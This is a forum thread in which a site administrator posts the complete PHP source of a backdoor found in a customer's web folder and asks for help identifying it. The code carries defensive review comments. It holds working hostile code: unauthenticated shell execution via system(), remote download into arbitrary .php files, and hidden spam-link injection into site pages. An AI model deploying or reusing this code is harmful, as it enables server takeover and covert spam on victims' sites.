Unknown Folder

  • CarbonTerry
    Major General

    • Oct 2005
    • 2620

    Unknown Folder

    Hello,
    I have found an unknown folder (zjfem) in a customer's public_html.
    Here's the code contained in a "ubu.php" file:
    <?php
    // Keep executing after the requesting client disconnects, and remove the
    // script execution-time limit, so a single request can run to completion
    // however long the file generation below takes.
    ignore_user_abort(1);
    set_time_limit(0);

    // Deletes three files from the script's working directory: "c" (the state
    // file the Gen*/Gen2 routines write), "1r.txt" (the list of generated page
    // paths they append to) and "log" (not written anywhere in this file).
    // NOTE(review): for incident response, copy these files before removal if
    // they still exist; they record what was created on the site.
    function Clear()
    {
    unlink("c");
    unlink("1r.txt");
    unlink("log");
    }

    // Strips previously injected content out of a page of the site.
    // The target path is read from a local file "m" and resolved one directory
    // above this script. Everything between the <dd4>/<dd5> markers (plain and
    // HTML-comment form), anchors whose tag contains "_lm", links matching
    // http...tmp6...</a>, and the zero-size hidden <font> opener are removed,
    // then the page is written back and " upt-ok" is printed.
    // NOTE(review): these markers and the hidden-font style string are useful
    // search terms when checking the site's own pages for injected content.
    // NOTE(review): ereg_replace() was removed in PHP 7.0, so this code only
    // runs on PHP 5.x.
    function Clear2()
    {
    // "m" holds the relative path of the page that was modified.
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
    $fin = ereg_replace("<!--dd5-->", "", $fin);
    $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    // Overwrite the page in place with the cleaned text.
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
    }

    // Copies the request parameter $name into $var (passed by reference).
    // POST is read first and GET second, so a GET value overrides a POST value.
    // Returns false when the result loosely equals the empty string, true
    // otherwise. No validation or filtering is applied to the value.
    function GetVar($name, &$var)
    {
    $var = "";
    if (isset($_POST[$name]))
    $var = $_POST[$name];

    if (isset($_GET[$name]))
    $var = $_GET[$name];

    if (($var) =="")
    return false;
    else return true;
    }


    // Creates a randomly named directory under the script's location (once),
    // drops an .htaccess into it, then fetches a page ten times from a
    // caller-supplied location and stores each copy as
    // <dir>/<name>/<name>.htm, logging every path to "1r.txt".
    // The "sg" request parameter is used, unvalidated, as the prefix of every
    // path that is opened for reading.
    // NOTE(review): "sg" is presumably a remote URL prefix (that would need
    // allow_url_fopen); confirm against web-server logs. The .htaccess content
    // and the page content both come from that location, so review any
    // .htaccess found in such a directory before trusting the site's
    // rewrite/handler configuration.
    function GenNew()
    {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    // Source prefix taken straight from the request; GET overrides POST.
    if (isset($_POST["sg"]))
    $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
    $sg = $_GET["sg"];

    $path = "";
    // Append-mode log of every generated page.
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c"))
    {
    // Later runs: reuse the directory name stored on the first line of "c".
    $fconf = file("c");
    $tname = trim($fconf[0]);
    }
    else
    {
    // First run: pick a 5-letter directory name, create it and record it.
    $fconf = fopen("c", "w+");
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<5; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $tname = $nm;
    mkdir($tname);
    fwrite($fconf, $tname);
    $pid = 0;
    $fht = fopen("$tname/.htaccess", "w+");

    // The .htaccess body is whatever <sg>2.txt returns.
    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);
    }
    $gname = $sg."sgen.php";
    // Ten fetches per request.
    for ($j=$pid; $j<$pid+10; $j++)
    {

    $fc = "";
    $fp = fopen($gname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);

    // The text following "</html>" in the fetched content becomes the
    // directory and file name; it is used as a path component unchecked.
    $arr = explode("</html>", $fin);
    //print_r($arr);
    $curs = trim($arr[1]);

    $newf = "$tname/$curs/";
    echo "$newf";
    mkdir($newf);
    $fnd = fopen("$tname/$curs/$curs".".htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    fwrite($fr, "$tname/$curs/$curs".".htm\n");


    }

    }

    // Variant of the page generator that works from a keyword list.
    // On first run it creates a randomly named directory and populates it with
    // an .htaccess, a "2.js" and (in the script directory) a list file "1t",
    // all fetched from the caller-supplied "sg" prefix. Each request then
    // fetches ten pages (one per line of "1t", continuing from the index
    // stored in "c"), inserts 30 cross-links to other entries in place of the
    // <LINKS2> placeholder, and writes each page as <dir>/<entry>.htm.
    // With the "md" GET flag set, every written path is also logged to
    // "1r.txt".
    // NOTE(review): "sg" is unvalidated and presumably a remote URL prefix
    // (a query string is appended to it below); confirm from logs. The
    // fetched .htaccess and 2.js are attacker-chosen content served from the
    // site, so inspect both when such a directory is found.
    function Gen2()
    {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    $md = false;
    // Source prefix taken straight from the request; GET overrides POST.
    if (isset($_POST["sg"]))
    $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
    $sg = $_GET["sg"];

    if (isset($_GET["md"]))
    $md = true;

    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c"))
    {
    // State file layout here: line 1 = directory name, line 2 = next index
    // into the "1t" list.
    $fconf = file("c");
    $tname = trim($fconf[0]);
    $i_dor = trim($fconf[1]);
    $i_dor = $i_dor+0;
    }
    else
    {
    // First run: pick a 5-letter directory name and initialise the state.
    $fconf = fopen("c", "w+");
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<5; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $tname = $nm;
    mkdir($tname);
    fwrite($fconf, $tname."\n");
    fwrite($fconf, "0\n");
    $pid = 0;
    // .htaccess body comes from <sg>2.txt.
    $fht = fopen("$tname/.htaccess", "w+");
    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);


    // Script file 2.js comes from <sg>2js.txt.
    $fht = fopen("$tname/2.js", "w+");
    $htname = $sg."2js.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);



    // The entry list "1t" comes from <sg>1t.php and is stored next to this
    // script, not inside the generated directory.
    $f1t = fopen("1t", "w+");
    $f1tname = $sg."1t.php";
    $fp = fopen($f1tname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($f1t, $fin);
    fclose($f1t);


    }
    $i_dor++;
    $i_dor--;
    $a1t = file("1t");
    $gname = $sg."sgen2.php";
    // Ten pages per request.
    for ($j=$pid; $j<$pid+10; $j++)
    {

    // Next entry from the list; it is sent to the source as "th" and also
    // used as the output file name.
    $cth = trim($a1t[$i_dor]);
    $i_dor++;
    $fc = "";
    $fp = fopen($gname."?th=$cth", "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);


    // Build 30 links to randomly chosen entries among the first 200 lines of
    // the list, so the generated pages reference one another.
    $links ="";
    for ($y=0; $y<30; $y++)
    {
    $ry = mt_rand(0,199);
    $rth = trim($a1t[$ry]);
    $links .= "<a href='$rth.htm'>$rth</a> \n";
    }
    $fin = ereg_replace("<LINKS2>", $links, $fin);

    $curs = $cth;
    $fnd = fopen("$tname/$curs".".htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    if ($md)
    {
    fwrite($fr, "$tname/$curs".".htm\n");
    }
    }
    // Persist the directory name and the advanced list index for the next run.
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n".$i_dor."\n");
    fclose($fconf);
    }

    // Batch page generator driven by the "sg" (source prefix) and "gm"
    // (topic value) request parameters. Pages are written ten per request as
    // <dir>/<subdir>/<topic>_<n>.htm; progress is kept in the state file "c"
    // (directory, sub-directory, topic, counter). When the counter reaches
    // 100 an extra <topic>_lm.htm page is fetched and its path logged to
    // "1r.txt", and the next run starts a new 3-letter sub-directory.
    // NOTE(review): both parameters are unvalidated; "sg" is presumably a
    // remote URL prefix (a query string is appended to it), to be confirmed
    // from logs. Expect up to 101 .htm files per sub-directory when sizing a
    // clean-up.
    function Gen()
    {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    // Source prefix; GET overrides POST.
    if (isset($_POST["sg"]))
    $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
    $sg = $_GET["sg"];

    // Topic value passed on to the source and used in output file names.
    if (isset($_POST["gm"]))
    $g = $_POST["gm"];

    if (isset($_GET["gm"]))
    $g = $_GET["gm"];


    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c"))
    {
    // State file layout here: directory, sub-directory, topic, counter.
    $fconf = file("c");
    $tname = trim($fconf[0]);
    $cname = trim($fconf[1]);
    $curs = trim($fconf[2]);
    $pid = trim($fconf[3]);
    if ($pid == 100)
    {
    // Previous batch is complete: reset the counter, start a new 3-letter
    // sub-directory and switch to the topic supplied in this request.
    $pid = 0;
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<3; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $cname = $nm;
    mkdir("$tname/$cname");
    $curs = $g;
    }
    }
    else
    {
    // First run: create the 5-letter top directory, its .htaccess (content
    // fetched from <sg>2.txt) and the first 3-letter sub-directory.
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<5; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $tname = $nm;
    $pid = 0;
    $curs = $g;
    mkdir($tname);
    $fht = fopen("$tname/.htaccess", "w+");
    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<3; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $cname = $nm;
    mkdir("$tname/$cname");
    }
    $gname = $sg."sgen.php";
    // Ten pages per request, numbered from the stored counter.
    for ($j=$pid; $j<$pid+10; $j++)
    {
    $fp = fopen($gname."?g=$curs", "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);

    $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    }

    // After the hundredth page, fetch one more page with m=1 and record its
    // path in the log file.
    if ($j==100)
    {
    $fp = fopen($gname."?g=$curs&m=1", "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    $map = "$path/$tname/$cname/$curs"."_lm.htm";
    fwrite($fr,"$map\n");
    }

    // Save progress for the next request.
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);

    }

    // Reads everything from the location given in the "u" request parameter
    // and writes it to "<name>.php", where "name" is a GET parameter.
    // Neither value is validated and no authentication is performed, so any
    // caller can place arbitrary PHP code in a file of their choosing relative
    // to this script's directory.
    // NOTE(review): because of this routine, other .php files on the account
    // cannot be assumed clean just because this file is deleted; compare the
    // whole docroot against a known-good copy.
    function Update()
    {
    if (isset($_GET["name"]))
    $sname = $_GET["name"];

    // Destination file name is built from the request value as-is.
    $thisname = "$sname.php";
    if (isset($_POST['u']))
    $u = $_POST['u'];

    if (isset($_GET['u']))
    $u = $_GET['u'];

    // Source is opened with fopen(); GET overrides POST.
    $fp = fopen($u, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);

    $fthis = fopen($thisname, "w+");
    fwrite($fthis, $fin);
    fclose($fthis);
    }

    // Passes the "c" request parameter (POST and/or GET) directly to
    // system(), with "@" suppressing any PHP error output. There is no
    // authentication, filtering or escaping: this is an unauthenticated
    // remote command-execution backdoor running as the web server's user.
    // NOTE(review): its presence means everything that user can read or write
    // should be treated as exposed. Deleting the folder and changing one
    // password does not establish that the account is clean; check for other
    // modified files, scheduled jobs and how this file was uploaded.
    function Com()
    {
    if (isset($_POST['c']))
    @system($_POST['c']);
    if (isset($_GET['c']))
    @system($_GET['c']);
    }

    // Injects fetched content into a page of the site.
    // The target path is read from the local file "m" and resolved one
    // directory above this script. The page's closing </body> and </html>
    // tags and any earlier injected block are removed, then the content read
    // from the location in the "mpt" request parameter is appended inside
    // <dd4>...<dd5> markers and a <font> element styled with zero height and
    // width, and the page is written back.
    // NOTE(review): the zero-size, absolutely positioned <font> hides the
    // injected content from visitors while leaving it in the HTML. Search the
    // site's own pages for "<dd4>", "<dd5>" and that style string to find
    // affected files.
    function MRepl()
    {
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">";
    $endtag = "</font></body></html><dd5> ";
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    // Source location for the injected content, taken from the request.
    GetVar("mpt", $mpt);
    // remove the closing HTML tags
    $fin = preg_replace ("/<\/body>/i", "", $fin);
    $fin = preg_replace ("/<\/html>/i", "", $fin);
    // Drop any block left by a previous run so it is replaced, not duplicated.
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
    $drs = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    // A failed or empty read ends the whole request before the page is
    // rewritten.
    if (!$fc)
    {
    exit();
    }
    $drs .= $fc;
    }
    fclose($fp);
    // Page + opening marker + fetched content + closing tags and marker.
    $fin = $fin.$begtag;
    $fin = $fin.$drs;
    $fin = $fin.$endtag;
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    }



    // Request dispatcher. The first of these parameters found in POST or GET
    // selects the action, after which the script exits:
    //   u   -> Update()  write fetched content to a .php file
    //   c   -> Com()     run a shell command
    //   g   -> Gen()     generate pages (batch mode)
    //   g1  -> GenNew()  generate pages (one directory per page)
    //   g2  -> Gen2()    generate pages from a list
    //   s   -> MRepl()   inject hidden content into a site page
    //   cl  -> Clear()   delete state and log files
    //   cl2 -> Clear2()  strip injected content from a site page
    // With none present it prints "<ok>".
    // No credential, token or origin check is made before dispatching.
    // NOTE(review): GET-style requests to this file name carrying any of the
    // parameters above should be visible in the web server's access log and
    // can help date the activity and identify the callers; POST bodies are
    // typically not logged.
    function Main()
    {
    if (isset($_POST['u']) || isset($_GET['u']))
    {
    Update();
    exit();
    }



    if (isset($_POST['c']) || isset($_GET['c']))
    {
    Com();
    exit();
    }

    if (isset($_POST['g']) || isset($_GET['g']))
    {
    Gen();
    exit();
    }

    if (isset($_POST['g1']) || isset($_GET['g1']))
    {
    GenNew();
    exit();
    }


    if (isset($_POST['g2']) || isset($_GET['g2']))
    {
    Gen2();
    exit();
    }

    if (isset($_POST['s']) || isset($_GET['s']))
    {
    MRepl();
    exit();
    }

    if (isset($_POST['cl']) || isset($_GET['cl']))
    {
    Clear();
    exit();
    }

    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
    Clear2();
    exit();
    }

    // Default reply when no action parameter is supplied.
    echo "<ok>";

    }

    // The dispatcher runs on every request to this file; nothing in the file
    // restricts who may call it.
    Main();

    ?>
    I need some help with this one.
    Thanks
    CarbonTerry
    Semper Fi
    Still green...still mean......just not as lean

    Red Hawk Archery
    Zone 5 Photo
    My USMC
  • Marincky
    General

    • Apr 2006
    • 4539

    #2
    Re: Unknown Folder

    Zap it!!
    Don't aim for success if you want it; just do what you love and believe in, and it will come naturally.


    • CarbonTerry
      Major General

      • Oct 2005
      • 2620

      #3
      Re: Unknown Folder

      Thanks M
      I will delete it right away. What is it?
      CarbonTerry
      Semper Fi
      Still green...still mean......just not as lean

      Red Hawk Archery
      Zone 5 Photo
      My USMC


      • Marincky
        General

        • Apr 2006
        • 4539

        #4
        Re: Unknown Folder

        I can't tell you what it is, but the only folders inside your public_html should be ones you recognise. At the extreme worst, if you delete something you shouldn't, you only have to republish the site. But if it were me I would have zapped it on first glance. Seen another post very similar to this earlier. Get rid.. and possibly even change your password ; - )
        Don't aim for success if you want it; just do what you love and believe in, and it will come naturally.


        • CarbonTerry
          Major General

          • Oct 2005
          • 2620

          #5
          Re: Unknown Folder

          password change completed.
          CarbonTerry
          Semper Fi
          Still green...still mean......just not as lean

          Red Hawk Archery
          Zone 5 Photo
          My USMC
